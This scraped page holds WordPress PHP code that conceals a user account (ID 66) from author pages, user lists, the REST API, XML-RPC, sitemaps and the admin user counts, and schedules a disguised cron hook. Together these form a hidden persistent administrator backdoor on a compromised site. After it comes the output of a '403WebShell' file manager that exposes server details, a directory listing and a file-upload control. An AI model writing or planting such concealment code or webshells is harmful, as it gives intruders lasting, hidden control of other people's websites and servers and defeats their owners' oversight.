add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / proc /814 /root /lib /python3 /dist-packages /botocore / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 14 2026 06:28:50
root / root
0755
__pycache__
--
November 06 2024 08:34:44
root / root
0755
crt
--
November 06 2024 08:34:44
root / root
0755
data
--
November 06 2024 08:34:34
root / root
0755
docs
--
November 06 2024 08:34:44
root / root
0755
retries
--
November 06 2024 08:34:44
root / root
0755
__init__.py
4.799 KB
February 20 2024 19:04:56
root / root
0644
args.py
29.922 KB
February 20 2024 19:02:40
root / root
0644
auth.py
42.776 KB
February 20 2024 19:02:40
root / root
0644
awsrequest.py
22.613 KB
February 20 2024 19:02:40
root / root
0644
cacert.pem
260.368 KB
February 20 2024 19:02:40
root / root
0644
client.py
50.04 KB
February 20 2024 19:02:40
root / root
0644
compat.py
10.809 KB
April 16 2024 13:49:10
root / root
0644
compress.py
4.326 KB
February 20 2024 19:02:40
root / root
0644
config.py
15.235 KB
February 20 2024 19:02:40
root / root
0644
configloader.py
9.804 KB
February 20 2024 19:02:40
root / root
0644
configprovider.py
36.357 KB
February 20 2024 19:02:40
root / root
0644
credentials.py
82.808 KB
February 20 2024 19:02:40
root / root
0644
discovery.py
10.815 KB
February 20 2024 19:02:40
root / root
0644
endpoint.py
16.056 KB
February 20 2024 19:02:40
root / root
0644
endpoint_provider.py
22.396 KB
February 20 2024 19:02:40
root / root
0644
errorfactory.py
3.635 KB
February 20 2024 19:02:40
root / root
0644
eventstream.py
19.97 KB
February 20 2024 19:02:40
root / root
0644
exceptions.py
22.229 KB
April 16 2024 13:49:10
root / root
0644
handlers.py
53.445 KB
February 20 2024 19:02:40
root / root
0644
history.py
1.703 KB
February 20 2024 19:02:40
root / root
0644
hooks.py
24.473 KB
February 20 2024 19:02:40
root / root
0644
httpchecksum.py
15.91 KB
February 20 2024 19:02:40
root / root
0644
httpsession.py
18.146 KB
February 20 2024 19:02:40
root / root
0644
loaders.py
18.392 KB
February 20 2024 19:02:40
root / root
0644
model.py
29.901 KB
February 20 2024 19:02:40
root / root
0644
monitoring.py
20.114 KB
February 20 2024 19:02:40
root / root
0644
paginate.py
26.75 KB
February 20 2024 19:02:40
root / root
0644
parsers.py
44.538 KB
February 20 2024 19:02:40
root / root
0644
regions.py
31.666 KB
February 20 2024 19:02:40
root / root
0644
response.py
7.058 KB
February 20 2024 19:02:40
root / root
0644
retryhandler.py
14.355 KB
February 20 2024 19:02:40
root / root
0644
serialize.py
32.346 KB
February 20 2024 19:02:40
root / root
0644
session.py
48.031 KB
February 20 2024 19:02:40
root / root
0644
signers.py
29.972 KB
February 20 2024 19:02:40
root / root
0644
stub.py
14.797 KB
February 20 2024 19:02:40
root / root
0644
tokens.py
10.654 KB
February 20 2024 19:02:40
root / root
0644
translate.py
3.326 KB
February 20 2024 19:02:40
root / root
0644
useragent.py
17.876 KB
February 20 2024 19:02:40
root / root
0644
utils.py
132.17 KB
February 20 2024 19:02:40
root / root
0644
validate.py
13.444 KB
February 20 2024 19:02:40
root / root
0644
waiter.py
13.955 KB
February 20 2024 19:02:40
root / root
0644
Youez - 2016 - github.com/yon3zuLinuXploit